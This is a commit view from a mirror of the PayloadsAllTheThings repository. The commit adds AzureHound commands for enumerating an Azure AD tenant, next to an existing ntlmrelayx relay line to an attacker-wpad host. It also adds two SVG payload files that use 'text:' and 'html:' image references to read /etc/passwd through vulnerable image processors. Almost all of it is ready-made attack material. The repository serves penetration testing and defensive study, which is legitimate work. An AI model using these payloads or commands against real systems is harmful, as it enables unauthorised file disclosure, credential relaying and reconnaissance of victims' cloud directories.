mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-11-10 07:04:22 +00:00
AzureHound
This commit is contained in:
parent
13ed9c8628
commit
b918095775
3 changed files with 21 additions and 0 deletions
|
@ -141,6 +141,17 @@
|
|||
ntlmrelayx.py -t ldaps://lab.local -wh attacker-wpad --delegate-access
|
||||
```
|
||||
|
||||
* [AzureHound](https://posts.specterops.io/introducing-bloodhound-4-0-the-azure-update-9b2b26c5e350)
|
||||
|
||||
```powershell
|
||||
# require: Install-Module -name Az -AllowClobber
|
||||
# require: Install-Module -name AzureADPreview -AllowClobber
|
||||
Connect-AzureAD
|
||||
Connect-AzAccount
|
||||
. .\AzureHound.ps1
|
||||
Invoke-AzureHound
|
||||
```
|
||||
|
||||
* [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon)
|
||||
|
||||
```powershell
|
||||
|
|
|
@ -0,0 +1,5 @@
|
|||
<svg width="1000" height="1000"
|
||||
xmlns:xlink="http://www.w3.org/1999/xlink">
|
||||
xmlns="http://www.w3.org/2000/svg">
|
||||
<image xlink:href="text:/etc/passwd" height="500" width="500"/>
|
||||
</svg>
|
After Width: | Height: | Size: 194 B |
|
@ -0,0 +1,5 @@
|
|||
<svg width="1000" height="1000"
|
||||
xmlns:xlink="http://www.w3.org/1999/xlink">
|
||||
xmlns="http://www.w3.org/2000/svg">
|
||||
<image xlink:href="html:/etc/passwd" height="500" width="500"/>
|
||||
</svg>
|
After Width: | Height: | Size: 194 B |
Loading…
Reference in a new issue